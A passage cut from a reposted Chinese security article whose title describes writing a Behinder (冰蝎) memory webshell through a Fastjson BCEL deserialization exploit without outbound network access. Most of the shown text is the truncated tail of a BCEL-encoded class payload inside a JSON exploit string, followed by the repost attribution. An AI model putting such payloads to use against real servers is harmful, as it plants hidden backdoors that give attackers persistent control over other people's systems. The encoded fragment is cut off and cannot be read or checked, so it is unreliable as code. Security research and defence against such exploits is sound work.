dY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"}} : "xxx"}}
原文始发于微信公众号(哈拉少安全小队):Fastjson BCEL不出网写入冰蝎内存马
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论